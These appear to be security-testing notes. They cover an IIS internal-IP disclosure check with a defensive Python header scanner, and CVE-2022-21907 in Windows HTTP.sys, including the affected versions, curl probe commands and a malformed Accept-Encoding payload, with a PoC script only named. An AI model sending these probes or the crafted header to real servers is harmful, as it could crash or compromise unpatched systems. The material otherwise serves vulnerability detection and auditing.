IIS Local IP Disclosure

**curl -v -I --http1.0 https://pm.company.com/ -H 'Host:'**
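To audit your own servers for this leak, the header output of the command above can be scanned for RFC 1918 addresses, which typically appear in the `Location` or `Content-Location` header. This is an added example, not part of the original notes; `find_internal_ips` is a hypothetical helper name and the sample responses are constructed.

```python
import ipaddress
import re

# RFC 1918 ranges; anything in these should never appear in a public response.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Candidate dotted quads; real validation is done by ipaddress below.
IPV4_RE = re.compile(r"(?<![\d.])\d{1,3}(?:\.\d{1,3}){3}(?![\d.])")


def find_internal_ips(raw_headers):
    """Return [(header_name, ip), ...] for RFC 1918 addresses in response headers.

    Accepts plain `curl -I` output or `curl -v` output ("< " prefixed lines).
    """
    findings = []
    for line in raw_headers.splitlines():
        if line.startswith(("*", ">")):      # curl -v info and request lines
            continue
        line = line.lstrip("< ").rstrip()
        if ":" not in line:                  # status line or blank separator
            continue
        name, _, value = line.partition(":")
        for candidate in IPV4_RE.findall(value):
            try:
                ip = ipaddress.ip_address(candidate)
            except ValueError:               # e.g. 999.1.1.1
                continue
            if any(ip in net for net in RFC1918):
                findings.append((name.strip(), str(ip)))
    return findings


# Constructed sample responses (not captured from a real host).
SAMPLE_LEAKY = """HTTP/1.1 302 Redirect
Content-Type: text/html; charset=UTF-8
Location: https://10.20.30.40/
Server: Microsoft-IIS/10.0
Date: Tue, 01 Feb 2022 10:00:00 GMT
"""
SAMPLE_CLEAN = SAMPLE_LEAKY.replace("10.20.30.40", "pm.company.com")

if __name__ == "__main__":
    for header, ip in find_internal_ips(SAMPLE_LEAKY):
        print(f"internal address {ip} disclosed in {header} header")
```

Four-part version strings that happen to start with a private prefix can produce a false positive, so review each finding against the header it came from.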

CVE-2022-21907 - HTTP Protocol Stack Remote Code Execution Vulnerability

Windows10Exploits/2022/CVE-2022-21907 at master · nu11secur1ty/Windows10Exploits

Affected MS-Windows Versions


Microsoft Windows 10     | Windows 10 Version 1809 for 32-bit Systems
                         | Windows 10 Version 1809 for x64-based Systems
                         | Windows 10 Version 1809 for ARM64-based Systems
                         | Windows 10 Version 21H1 for 32-bit Systems
                         | Windows 10 Version 21H1 for x64-based Systems
                         | Windows 10 Version 21H1 for ARM64-based Systems
                         | Windows 10 Version 20H2 for 32-bit Systems
                         | Windows 10 Version 20H2 for x64-based Systems
                         | Windows 10 Version 20H2 for ARM64-based Systems
                         | Windows 10 Version 21H2 for 32-bit Systems
                         | Windows 10 Version 21H2 for x64-based Systems
                         | Windows 10 Version 21H2 for ARM64-based Systems

Microsoft Windows 11     | Windows 11 for x64-based Systems
                         | Windows 11 for ARM64-based Systems

Microsoft Windows Server | Windows Server 2019 and Core Installation
                         | Windows Server 2022 and Server Core Installation
                         | Windows Server 20H2 Server Core Installation

Detection

curl "http://192.168.1.8/201" -H "Accept-Encoding: pwn, pwned, package"
curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package"
curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package"

Request

Accept-Encoding: -1337,,,,,,,,,

POC

python3 PoC-CVE-2022-21907.py